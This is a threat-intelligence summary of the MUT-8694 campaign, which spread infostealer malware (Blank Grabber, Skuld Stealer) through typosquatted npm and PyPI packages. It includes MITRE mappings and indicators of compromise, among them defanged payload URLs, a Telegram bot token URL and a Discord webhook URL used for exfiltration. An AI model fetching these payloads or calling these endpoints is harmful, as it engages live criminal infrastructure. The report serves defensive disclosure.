Datadog Security Research uncovered a supply-chain campaign distributing infostealer malware via malicious npm and PyPI packages that target developers, especially in the gaming community. The actor used typosquatting and legitimate hosting platforms to deliver payloads and maintain C2 communications. #MUT8694 #SkuldStealer
Keypoints
- Supply-chain campaign observed targeting both npm and PyPI repositories to deliver malicious packages.
- Threat actor identified as MUT-8694 leveraging typosquatting to impersonate legitimate packages.
- Malicious packages (e.g., larpexodus on PyPI, nodelogic on npm) execute PowerShell to download and run payloads.
- Datadog’s GuardDog detection flagged the malicious packages, enabling discovery and response.
- Malware families involved include Blank Grabber and Skuld Stealer, focused on credential theft and data exfiltration.
- Researchers identified 42 malicious packages on PyPI and 18 on npm linked to the campaign.
- Infrastructure includes GitHub raw URLs, Replit-hosted payloads, Telegram bot endpoints, and a Discord webhook for C2 or exfiltration.
MITRE Techniques
- [T1071] Command and Control – Uses multiple command-and-control domains and web endpoints to maintain communications and exfiltrate data (‘Utilizes multiple command and control domains to maintain communication with compromised systems.’)
- [T1203] Exploitation for Client Execution – Executes malicious code via crafted package install scripts and PowerShell commands to run downloaded payloads (‘Exploits vulnerabilities in software to execute malicious code.’)
- [T1003] Credential Dumping – Harvests credentials from the endpoint to enable further access and data theft (‘Collects credentials from the operating system to gain unauthorized access.’)
- [T1041] Exfiltration Over C2 Channel – Transfers stolen data to external services and C2 endpoints like webhooks and bot APIs (‘Transfers stolen data to an external location.’)
- [T1027] Obfuscated Files or Information – Uses obfuscation and script techniques to hide malicious behavior and evade detection (‘Uses obfuscation techniques to hide malicious code from detection.’)
Indicators of Compromise
- [File Name] Suspicious binaries used as payloads or droppers – CBLines.exe, RobloxPlayerLauncher.exe
- [File Name] System utility invoked by installers – cmd.exe (used to run PowerShell/download commands)
- [URL] Hosted payloads/download locations – https://github[.]com/holdthatcode/e/raw/main/CBLines.exe, https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/skuld (and other Replit-hosted payloads)
- [URL] Command/exfiltration endpoints – https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getUpdates, https://discord[.]com/api/webhooks/1296197362108338248/k492vQ1I3SDXcmvWcvsy2EcSUzrwhNmILrYhR3qSF8R7tkcE-C5GgZSxuS3IlNschBWg